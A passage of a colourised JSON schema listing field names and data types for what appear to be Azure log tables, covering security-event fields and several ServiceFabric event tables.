\u001b[94m\"ClassName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CommandLine\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CompatibleIds\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DCDNSName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Disposition\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainBehaviorVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainPolicyChanged\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EAPType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ElevatedToken\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorCode\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventData\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventID\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExtendedQuarantineState\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FailureReason\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileHash\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FilePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FilePathNoUser\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Filter\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ForceLogoff\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Fqbn\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FullyQualifiedSubjectMachineName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FullyQualifiedSubjectUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GroupMembership\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HandleId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HardwareIds\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HomeDirectory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HomePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InterfaceUuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IpPort\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"KeyLength\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LmPackageName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LocationInformation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LockoutDuration\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LockoutObservationWindow\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LockoutThreshold\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LoggingResult\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonHours\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"LogonTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineAccountQuota\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineInventory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineLogon\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MandatoryLabel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaxPasswordAge\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MemberName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MemberSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MinPasswordAge\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MinPasswordLength\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MixedDomainMode\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NASIPv4Address\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NASIPv6Address\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NASIdentifier\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NASPort\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NASPortType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkPolicyName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewDate\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewMaxUsers\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewProcessId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewRemark\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewShareFlags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewUacValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewValueType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectServer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectValueName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OemInformation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldMaxUsers\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldRemark\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldShareFlags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldUacValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldValueType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PackageName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ParentProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PasswordHistoryLength\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PasswordLastSet\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PasswordProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PreviousDate\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PreviousTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PrimaryGroupId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PrivateKeyUsageCount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PrivilegeList\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Process\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProfilePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Properties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProtocolSequence\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProxyPolicyName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QuarantineHelpURL\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QuarantineSessionID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QuarantineSessionIdentifier\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QuarantineState\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QuarantineSystemHealthResult\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RelativeTargetName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemotePort\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Requester\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RestrictedAdminMode\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RowsDeleted\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SamAccountName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ScriptPath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SecurityDescriptor\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceFileName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceStartType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ShareLocalPath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ShareName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SidHistory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceComputerId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StorageAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubcategoryGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubcategoryId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Subject\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectDomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectKeyIdentifier\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectLogonId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectMachineName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectMachineSID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectUserSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TableId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetDomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetInfo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetLinkedLogonId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetLogonGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetLogonId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetOutboundDomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetOutboundUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetServerName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetUser\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetUserSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Task\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateContent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateDSObjectFQDN\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateInternalName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateOID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateSchemaVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TokenElevationType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TransmittedServices\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAccountControl\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserParameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserPrincipalName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserWorkstations\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VendorIds\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VirtualAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Workstation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"WorkstationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ServiceFabricOperationalEvent\"\u001b[39;49;00m: {\n        \u001b[94m\"ApplicationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationTypeVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ChannelName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventId\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"KeywordName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OpcodeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PartitionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Pid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ProviderGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Role\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TaskName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UpgradeDomains\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ServiceFabricReliableActorEvent\"\u001b[39;49;00m: {\n        \u001b[94m\"ActorId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActorIdKind\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ActorType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ChannelName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CountOfWaitingMethodCalls\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"EventId\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Exception\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IsStateful\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KeywordName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MethodExecutionTimeTicks\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"MethodName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MethodSignature\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NodeId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NodeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OpcodeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PartitionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Pid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ProviderGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ReplicaId\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"ReplicaOrInstanceId\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"Role\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SaveStateExecutionTimeTicks\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TaskName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ServiceFabricReliableServiceEvent\"\u001b[39;49;00m: {\n        \u001b[94m\"ActualCancellationTimeMillis\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ChannelName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventId\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Exception\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InstanceId\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"KeywordName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OpcodeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PartitionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Pid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ProviderGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ReplicaId\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"Role\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        